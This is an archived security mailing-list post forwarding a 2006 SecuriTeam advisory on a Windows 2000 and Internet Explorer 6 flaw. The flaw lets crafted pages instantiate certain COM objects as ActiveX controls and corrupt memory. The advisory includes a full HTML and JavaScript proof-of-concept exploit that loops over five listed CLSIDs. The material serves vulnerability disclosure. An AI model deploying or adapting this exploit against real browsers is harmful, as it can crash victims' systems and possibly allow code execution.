ðòïåëôù 


  áòèé÷ 


Apache-Talk @lexa.ru 

Inet-Admins @info.east.ru 

Filmscanners @halftone.co.uk 

Security-alerts @yandex-team.ru 

nginx-ru @sysoev.ru 

  óôáôøé 


  ðåòóïîáìøîïå 


  ðòïçòáííù 



ðéûéôå
ðéóøíá














     áòèé÷ :: Security-alerts
Security-Alerts mailing list archive (security-alerts@yandex-team.ru)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[security-alerts] FW: [NT] Windows 2000 Multiple COM Object Instantiation Vulnerability



> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx] 
> Sent: Tuesday, August 22, 2006 7:46 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [NT] Windows 2000 Multiple COM Object Instantiation 
> Vulnerability
> - - - - - - - - -
> 
> 
> 
> Windows 2000 Multiple COM Object Instantiation Vulnerability 
> 
> 
> 
> Multiple vulnerability has been found in Windows 2000, when 
> Internet Explorer tries to instantiate the ciodm.dll, 
> MyInfo.dll, msdxm.ocx, Creator.dll (Media player 9) COM 
> object as an ActiveX control, it may corrupt system memory in 
> such a way that an attacker may DoS and possibly could 
> execute arbitrary code. 
> 
> 
> Vulnerable Systems: 
>  * Windows 2000 with Internet Explorer 6.0 SP1 
> 
> Exploit: 
> <!-- 
> 
> // Windows 2000 Multiple COM Object Instantiation Vulnerability 
> // tested on Windows 2000 SP4 CN 
> 
> // http://www.xsec.org 
> // nop (nop#xsec.org) 
> 
> --!> 
> <html> 
> <head> 
> <title>COM-tester</title> 
> </head> 
> </body> 
> <script> 
> var i =0; 
> var clsid = new Array( 
> 
> // NO: 1 
> // CLSID: {3BC4F3A3-652A-11D1-B4D4-00C04FC2DB8D} 
> // Info: Microsoft Index Server Catalog Administration Object 
> // ProgID: Microsoft.ISCatAdm.1 
> // InprocServer32: C:\WINNT\system32\ciodm.dll 
> "{3BC4F3A3-652A-11D1-B4D4-00C04FC2DB8D}", 
> 
> // NO: 2 
> // CLSID: {4682C82A-B2FF-11D0-95A8-00A0C92B77A9} 
> // Info: MyInfo ASP Component// ProgID: MSWC.MyInfo.1 
> // InprocServer32: C:\WINNT\system32\inetsrv\MyInfo.dll 
> "{4682C82A-B2FF-11D0-95A8-00A0C92B77A9}", 
> 
> 
> // NO: 3 
> // CLSID: {8E71888A-423F-11D2-876E-00A0C9082467} 
> // Info: RadioServer Class 
> // ProgID: Mmedia.RadioServer.1 
> // InprocServer32: C:\WINNT\system32\msdxm.ocx 
> "{8E71888A-423F-11D2-876E-00A0C9082467}", 
> 
> 
> // NO: 4 media player? 
> // CLSID: {606EF130-9852-11D3-97C6-0060084856D4} 
> // Info: CdCreator Class// ProgID: Creator.CdCreator.1 
> // InprocServer32: C:\Program Files\Common Files\Adaptec 
> Shared\CreatorAPI\creator.dll 
> "{606EF130-9852-11D3-97C6-0060084856D4}", 
> 
> // NO: 5 media player? 
> // CLSID: {F849164D-9863-11D3-97C6-0060084856D4} 
> // Info: CdDevice Class// ProgID: Creator.CdDevice.1 
> // InprocServer32: C:\Program Files\Common Files\Adaptec 
> Shared\CreatorAPI\creator.dll 
> "{F849164D-9863-11D3-97C6-0060084856D4}", 
> 
> // END 
> null 
> ); 
> 
> while(clsid[i]) 
> { 
> var a = document.createElement("object"); 
> 
> window.status = "Testing Object " + clsid[i] + "..."; 
> 
> a.setAttribute("classid", "clsid:" + clsid[i]); 
> 
> i++; 
> } 
> 
> window.status = "failed!"; 
> 
> </script> 
> </body> 
> </html> 
> 
> 
> Additional Information: 
> The information has been provided by nop <mailto:nop@xxxxxxxx> . 
> The original article can be found at: 
> http://www.xsec.org/index.php?module=Releases&act=view&type=1&id=16 
> 
> 
> ==============================================================
> ================== 
> 
> 
> 
> 
> 
> This bulletin is sent to members of the SecuriTeam mailing list. 
> To unsubscribe from the list, send mail with an empty subject 
> line and body to: html-list-unsubscribe@xxxxxxxxxxxxxx 
> In order to subscribe to the mailing list and receive 
> advisories in HTML format, simply forward this email to: 
> html-list-subscribe@xxxxxxxxxxxxxx 
> 
> 
> 
> ==============================================================
> ================== 
> ==============================================================
> ================== 
> 
> DISCLAIMER: 
> The information in this bulletin is provided "AS IS" without 
> warranty of any kind. 
> In no event shall we be liable for any damages whatsoever 
> including direct, indirect, incidental, consequential, loss 
> of business profits or special damages. 
> 
> 
> 
> 
> 
> 




 




Copyright © Lexa Software, 1996-2009.